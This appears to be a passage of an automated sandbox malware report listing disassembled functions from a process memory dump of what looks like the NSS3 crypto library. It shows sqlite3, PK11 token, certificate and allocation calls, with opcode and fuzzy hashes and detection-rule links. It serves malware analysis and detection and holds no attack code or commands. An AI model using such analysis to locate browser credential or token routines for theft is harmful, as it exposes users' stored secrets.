                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                            • String ID: simple
                                                            • API String ID: 1130978851-3246079234
                                                            • Opcode ID: f2eab2a8215b3a35a4970cd35037c22160fbbd6ba7eb93e0e9eaa6142f3ed278
                                                            • Instruction ID: 9fc63b9dfe922c6eb4bac8d799b1592cb65f0c4b4030575ebfb8c0472e26ad42
                                                            • Opcode Fuzzy Hash: f2eab2a8215b3a35a4970cd35037c22160fbbd6ba7eb93e0e9eaa6142f3ed278
                                                            • Instruction Fuzzy Hash: D591B2B0A012058FDB05CF55D880A6ABBB6FF9831CF25C56ED8199BB52D731E851CB90
                                                            Function 6C9F5CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C9F5EC9
                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9F5EED
                                                            Strings
                                                            • API call with %s database connection pointer, xrefs: 6C9F5EC3
                                                            • unable to close due to unfinalized statements or unfinished backups, xrefs: 6C9F5E64
                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9F5ED1
                                                            • misuse, xrefs: 6C9F5EDB
                                                            • %s at line %d of [%.10s], xrefs: 6C9F5EE0
                                                            • invalid, xrefs: 6C9F5EBE
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: sqlite3_log
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                            • API String ID: 632333372-1982981357
                                                            • Opcode ID: 1e1a99aed27bca5a09842ceb736c98f6ce53760ea245d039cd0f9862e6d339e7
                                                            • Instruction ID: f7f77cc6aa73950c753b6a8f6a624a71154b5a893a83049ec24d4b75f50b66d5
                                                            • Opcode Fuzzy Hash: 1e1a99aed27bca5a09842ceb736c98f6ce53760ea245d039cd0f9862e6d339e7
                                                            • Instruction Fuzzy Hash: 3E81C030B06A119BEB19CF25C858B6A7779BF4131CF298268D8355BB51C730E857CBE1
                                                            Function 6C9DDCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9DDDF9
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9DDE68
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9DDE97
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C9DDEB6
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9DDF78
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                            • API String ID: 1526119172-598938438
                                                            • Opcode ID: e5b82e16f6f088c2dce41308fbd60257dad83e4ccc49f30b48effc418f8b6ea7
                                                            • Instruction ID: ebab44f5c38f37d7b727de352c65fa66639d42e52bee5b7c81db224a2f1d379b
                                                            • Opcode Fuzzy Hash: e5b82e16f6f088c2dce41308fbd60257dad83e4ccc49f30b48effc418f8b6ea7
                                                            • Instruction Fuzzy Hash: F181AF76604B019FDB14CF25C880B6A77E5AB55308F16882CE88A9BB91E731F845CB62
                                                            Function 6CA4CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.VCRUNTIME140(?,00000100,?), ref: 6CA4CD08
                                                            • PK11_DoesMechanism.NSS3(?,?), ref: 6CA4CE16
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA4D079
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: DoesErrorK11_MechanismValuememcpy
                                                            • String ID:
                                                            • API String ID: 1351604052-0
                                                            • Opcode ID: 54ffc59407a349fc39dece97161357478d7ab39d4616891a37fe0a0fd58e5c2d
                                                            • Instruction ID: c5589df958d8eecf7489f497db5285bce7f18767359cacce2b33d68c091d1d33
                                                            • Opcode Fuzzy Hash: 54ffc59407a349fc39dece97161357478d7ab39d4616891a37fe0a0fd58e5c2d
                                                            • Instruction Fuzzy Hash: C8C16EB1E002199BDB10CF24CC81BDAB7B4BB48318F1481A8E94DA7741E775AED9CF91
                                                            Function 6CA3DC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6CA497C1,?,00000000,00000000,?,?,?,00000000,?,6CA27F4A,00000000), ref: 6CA3DC68
                                                              • Part of subcall function 6CA60BE0: malloc.MOZGLUE(6CA58D2D,?,00000000,?), ref: 6CA60BF8
                                                              • Part of subcall function 6CA60BE0: TlsGetValue.KERNEL32(6CA58D2D,?,00000000,?), ref: 6CA60C15
                                                            • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA3DD36
                                                            • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA3DE2D
                                                            • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA3DE43
                                                            • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA3DE76
                                                            • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA3DF32
                                                            • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA3DF5F
                                                            • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA3DF78
                                                            • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA3DFAA
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Alloc_Util$memcpy$Valuemalloc
                                                            • String ID:
                                                            • API String ID: 1886645929-0
                                                            • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                            • Instruction ID: 65f72318d02ca53fdbdbeb84eda1668b91605846c2841d4a589509175eaaeac2
                                                            • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                            • Instruction Fuzzy Hash: 5C81D774E26620CBFB105A19D8B03597AB7DB60349F38983AD51DCAFD1D774C4D8C602
                                                            Function 6CA13C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6CA13C76
                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6CA13C94
                                                              • Part of subcall function 6CA095B0: TlsGetValue.KERNEL32(00000000,?,6CA200D2,00000000), ref: 6CA095D2
                                                              • Part of subcall function 6CA095B0: EnterCriticalSection.KERNEL32(?,?,?,6CA200D2,00000000), ref: 6CA095E7
                                                              • Part of subcall function 6CA095B0: PR_Unlock.NSS3(?,?,?,?,6CA200D2,00000000), ref: 6CA09605
                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CA13CB2
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CA13CCA
                                                            • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6CA13CE1
                                                              • Part of subcall function 6CA13090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CA2AE42), ref: 6CA130AA
                                                              • Part of subcall function 6CA13090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CA130C7
                                                              • Part of subcall function 6CA13090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CA130E5
                                                              • Part of subcall function 6CA13090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA13116
                                                              • Part of subcall function 6CA13090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA1312B
                                                              • Part of subcall function 6CA13090: PK11_DestroyObject.NSS3(?,?), ref: 6CA13154
                                                              • Part of subcall function 6CA13090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA1317E
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                            • String ID:
                                                            • API String ID: 3167935723-0
                                                            • Opcode ID: c015474eccb62ac6b18bcf1ff94749f186b83837533b2e6d66f70258ea72b62a
                                                            • Instruction ID: e2bf8a63b22fc42274b1b34ce1de22bbcb1ddc23354c9044e8b6794619d7c876
                                                            • Opcode Fuzzy Hash: c015474eccb62ac6b18bcf1ff94749f186b83837533b2e6d66f70258ea72b62a
                                                            • Instruction Fuzzy Hash: 4A61C871A05300ABEB105E65DD41FBBB6B9EF04748F0C4428FE859BE92F721D998C7A1
                                                            Function 6CA53D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 6CA53440: PK11_GetAllTokens.NSS3 ref: 6CA53481
                                                              • Part of subcall function 6CA53440: PR_SetError.NSS3(00000000,00000000), ref: 6CA534A3
                                                              • Part of subcall function 6CA53440: TlsGetValue.KERNEL32 ref: 6CA5352E
                                                              • Part of subcall function 6CA53440: EnterCriticalSection.KERNEL32(?), ref: 6CA53542
                                                              • Part of subcall function 6CA53440: PR_Unlock.NSS3(?), ref: 6CA5355B
                                                            • TlsGetValue.KERNEL32 ref: 6CA53D8B
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA53D9F
                                                            • PR_Unlock.NSS3(?), ref: 6CA53DCA
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA53DE2
                                                            • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CA53E4F
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • TlsGetValue.KERNEL32 ref: 6CA53E97
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA53EAB
                                                            • PR_Unlock.NSS3(?), ref: 6CA53ED6
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA53EEE
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                            • String ID:
                                                            • API String ID: 2554137219-0
                                                            • Opcode ID: 5c3d63084f07afa9091ca6dcbb8af5bda851df3eb46c8654911d2f9178e576c7
                                                            • Instruction ID: 95b1faa914010dc76791d0e69112b2e0fe5a7251d5f573158d936dff66691d32
                                                            • Opcode Fuzzy Hash: 5c3d63084f07afa9091ca6dcbb8af5bda851df3eb46c8654911d2f9178e576c7
                                                            • Instruction Fuzzy Hash: 5B513972E022019FEB01AF69DC4576A73F4EF85718F498528DE4947A11EB31E8E8CBD1
                                                            Function 6CA02C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_ZAlloc_Util.NSS3(2E4FCCFD), ref: 6CA02C5D
                                                              • Part of subcall function 6CA60D30: calloc.MOZGLUE ref: 6CA60D50
                                                              • Part of subcall function 6CA60D30: TlsGetValue.KERNEL32 ref: 6CA60D6D
                                                            • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CA02C8D
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA02CE0
                                                              • Part of subcall function 6CA02E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CA02CDA,?,00000000), ref: 6CA02E1E
                                                              • Part of subcall function 6CA02E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CA02E33
                                                              • Part of subcall function 6CA02E00: TlsGetValue.KERNEL32 ref: 6CA02E4E
                                                              • Part of subcall function 6CA02E00: EnterCriticalSection.KERNEL32(?), ref: 6CA02E5E
                                                              • Part of subcall function 6CA02E00: PL_HashTableLookup.NSS3(?), ref: 6CA02E71
                                                              • Part of subcall function 6CA02E00: PL_HashTableRemove.NSS3(?), ref: 6CA02E84
                                                              • Part of subcall function 6CA02E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CA02E96
                                                              • Part of subcall function 6CA02E00: PR_Unlock.NSS3 ref: 6CA02EA9
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA02D23
                                                            • CERT_IsCACert.NSS3(00000001,00000000), ref: 6CA02D30
                                                            • CERT_MakeCANickname.NSS3(00000001), ref: 6CA02D3F
                                                            • free.MOZGLUE(00000000), ref: 6CA02D73
                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CA02DB8
                                                            • free.MOZGLUE ref: 6CA02DC8
                                                              • Part of subcall function 6CA03E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA03EC2
                                                              • Part of subcall function 6CA03E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA03ED6
                                                              • Part of subcall function 6CA03E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA03EEE
                                                              • Part of subcall function 6CA03E60: PR_CallOnce.NSS3(6CB62AA4,6CA612D0), ref: 6CA03F02
                                                              • Part of subcall function 6CA03E60: PL_FreeArenaPool.NSS3 ref: 6CA03F14
                                                              • Part of subcall function 6CA03E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA03F27
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                            • String ID:
                                                            • API String ID: 3941837925-0
                                                            • Opcode ID: 3ae1fe9db146359c9a40382b41547fb726a30a97315f63c71079ce3dd3f68408
                                                            • Instruction ID: 24c5b5095445c1555b06c1ec6401901a894a64765fd9020d9e020d32ec4071e3
                                                            • Opcode Fuzzy Hash: 3ae1fe9db146359c9a40382b41547fb726a30a97315f63c71079ce3dd3f68408
                                                            • Instruction Fuzzy Hash: 6C51C071B043119BEB009E25ED89B5B77E5EF8438CF180629EC5983650E731EC99CB92
                                                            Function 6CA07CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 6CA040D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CA03F7F,?,00000055,?,?,6CA01666,?,?), ref: 6CA040D9
                                                              • Part of subcall function 6CA040D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CA01666,?,?), ref: 6CA040FC
                                                              • Part of subcall function 6CA040D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CA01666,?,?), ref: 6CA04138
                                                            • PR_GetCurrentThread.NSS3 ref: 6CA07CFD
                                                              • Part of subcall function 6CAC9BF0: TlsGetValue.KERNEL32(?,?,?,6CB10A75), ref: 6CAC9C07
                                                            • SECITEM_ItemsAreEqual_Util.NSS3(?,6CB29030), ref: 6CA07D1B
                                                              • Part of subcall function 6CA5FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CA01A3E,00000048,00000054), ref: 6CA5FD56
                                                            • SECITEM_ItemsAreEqual_Util.NSS3(?,6CB29048), ref: 6CA07D2F
                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6CA07D50
                                                            • PR_GetCurrentThread.NSS3 ref: 6CA07D61
                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6CA07D7D
                                                            • free.MOZGLUE(?), ref: 6CA07D9C
                                                            • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6CA07DB8
                                                            • PR_SetError.NSS3(FFFFE023,00000000), ref: 6CA07E19
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                            • String ID:
                                                            • API String ID: 70581797-0
                                                            • Opcode ID: c17c63cb31721718a158fe771e2fd1f4d031b0134f63520b319032b804c16ab8
                                                            • Instruction ID: 34b0fe5f2d74b688a3a086658fad49e554bd225b31256a149b16ac165d03dde3
                                                            • Opcode Fuzzy Hash: c17c63cb31721718a158fe771e2fd1f4d031b0134f63520b319032b804c16ab8
                                                            • Instruction Fuzzy Hash: E541E772B0011A9BDB009E69BC41BBF37E8AF5039CF090024ED09E7751E730E999CBA1
                                                            Function 6CA17EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • free.MOZGLUE(?,00000000,00000000,?,?,?,6CA180DD), ref: 6CA17F15
                                                            • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6CA180DD), ref: 6CA17F36
                                                            • free.MOZGLUE(?,?,?,6CA180DD), ref: 6CA17F3D
                                                            • SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6CA180DD), ref: 6CA17F5D
                                                            • DeleteCriticalSection.KERNEL32(?,6CA180DD), ref: 6CA17F94
                                                            • free.MOZGLUE(?), ref: 6CA17F9B
                                                            • PR_SetError.NSS3(FFFFE08B,00000000,6CA180DD), ref: 6CA17FD0
                                                            • PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6CA180DD), ref: 6CA17FE6
                                                            • free.MOZGLUE(?,6CA180DD), ref: 6CA1802D
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
                                                            • String ID:
                                                            • API String ID: 4037168058-0
                                                            • Opcode ID: 8651f0144252d0a4b89966e90ce9a718b20f7f92f9fe886c84d4bf98e7a1aef2
                                                            • Instruction ID: 15044bb3ba6e0831e2525777934c88e7aaf4cbf8038ddeddae9083120571987b
                                                            • Opcode Fuzzy Hash: 8651f0144252d0a4b89966e90ce9a718b20f7f92f9fe886c84d4bf98e7a1aef2
                                                            • Instruction Fuzzy Hash: A941C5B5B491104FEB009FBAD988A5737B5AB4A358F150229E519C7BC0D7309449CBA2
                                                            Function 6CA5FEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA5FF00
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6CA5FF18
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CA5FF26
                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6CA5FF4F
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA5FF7A
                                                            • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA5FF8C
                                                            Memory Dump Source
